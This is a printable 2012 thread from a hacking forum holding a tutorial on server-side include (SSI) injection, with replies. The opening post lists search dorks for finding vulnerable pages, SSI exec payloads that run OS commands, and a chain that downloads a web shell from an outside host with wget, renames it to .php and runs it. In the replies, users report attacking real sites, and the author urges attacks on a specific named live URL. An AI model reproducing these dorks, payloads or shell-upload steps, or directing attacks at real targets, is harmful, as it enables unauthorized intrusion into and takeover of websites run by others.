Tutorial SSI Injection - Printable Version

Tutorial SSI Injection - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Tutorial SSI Injection (/Thread-Tutorial-SSI-Injection)

SSI Injection - Merkuri - 11-09-2012

In this tutorial, I will write about SSI Injection hope you like it. =)

Code:
SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server. SSI Injection exploits a web application's failure to sanitize user-supplied data before they are inserted into a server-side interpreted HTML file.

-Wikipedia

Server-side Include Injection gives us the power to execute OS commands or include a restricted files contents the next time the page is served.

First, you need to find vulnerable site. =D
Here are some dorks:

Code:
inurl:bin/Cklb/

inurl:login.shtml

inurl:login.shtm

inurl:login.stm

inurl:search.shtml

inurl:search.shtm

inurl:search.stm

inurl:forgot.shtml

inurl:forgot.shtm

inurl:forgot.stm

inurl:register.shtml

inurl:register.shtm

inurl:register.stm

inurl:login.shtml?page=

Hope those are enough!

Time to test sites for vulnerability.

To find if the site is vulnerable, you should enter OS command.

Here are some example commands.

Code:
<!--#echo var="DATE_LOCAL" -->

Will display the Date.

<!--#exec cmd="whoami"-->

Will show which user is running on the server.

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>  

Will display all files in the directory (Linux).

<!-- #exec cmd="dir" -->

Will display all files in the directory (Windows).

<!--#echo var="DOCUMENT_URI" -->

Will display the document uri.

Write one of those commands in text box, login/registration fields etc...

[Image: ssiy.jpg]

So when, you have find and test site for vulnerability its time to exploit it.
We are going to upload shell, you can download shells from my thread.
Ok, now you need .txt extension to your shell and you should upload it some where (hacked site, hosting...).
And, you should download it to the site who is vulnerable to SSI Injection. This is the command you should use.

Code:
<!--#exec cmd="wget URL to shell" -->

So, if the text file is downloaded execute this command.

Code:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

This coomand will show every file in the directory.
Now its time to change the extension to .php .

Code:
<!--#exec cmd="mv shell1.txt shell.php" -->

Now run listen command again.

Code:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

And, your shell should be .php run it if every thing is OK, you have successful exploit the site.

Re: SSI Injection - Dismas - 11-09-2012

Nice tutorial. The grammar is decent as well. Biggrin

RE: SSI Injection - Oneiiros - 11-09-2012

Hm, I always get forwarded to nsa.gov when i try to upload my shell, seems like this is not working anymore :/

RE: SSI Injection - Merkuri - 11-09-2012

(11-09-2012, 12:47 PM)Oneiiros Wrote: Hm, I always get forwarded to nsa.gov when i try to upload my shell, seems like this is not working anymore :/

No idea, last time I exploit site with SSI Injection was before maybe year, I have try to exploit one site and I get into nsa.gov too, I will see what I can do.

Edit : Try attacking this site

Code:
http://www.wppionlinecontest.com/bin/Cklb

, I haven't upload shell but i have try some commands and haven't redirect me to nsa.gov .

RE: SSI Injection - Oneiiros - 11-09-2012

Quote:The user:
[an error occurred while processing this directive]
[an error occurred while processing this directive], does not exist, please try again

Seems like this isn't working anymore, but still a good tutorial!

RE: SSI Injection - Crow_SL - 11-09-2012

Nice tutorial, old method but it's useful

RE: SSI Injection - Charon - 11-09-2012

Nice tutorial Synchro, you made it look easy!

~INST1NCT

RE: SSI Injection - Nohbdy - 11-09-2012

Make sure you know what the target server is running. Apache SSI syntax is different from Nginx SSI syntax (and I think also different from Lighty).

EDIT: Quoting the whole OP is a bit obnoxious.

EDIT: Relevant documentation

Apache: https://httpd.apache.org/docs/2.2/howto/ssi.html
Nginx: http://wiki.nginx.org/HttpSsiModule
Lighty: http://redmine.lighttpd.net/projects/1/wiki/docs_modssi

RE: SSI Injection - Merkuri - 11-09-2012

(11-09-2012, 09:34 PM)Nohbdy Wrote: Make sure you know what the target server is running. Apache SSI syntax is different from Nginx SSI syntax (and I think also different from Lighty).

EDIT: Quoting the whole OP is a bit obnoxious.

EDIT: Relevant documentation

Apache: https://httpd.apache.org/docs/2.2/howto/ssi.html
Nginx: http://wiki.nginx.org/HttpSsiModule
Lighty: http://redmine.lighttpd.net/projects/1/wiki/docs_modssi

Thanks, I love when somebody add something I forget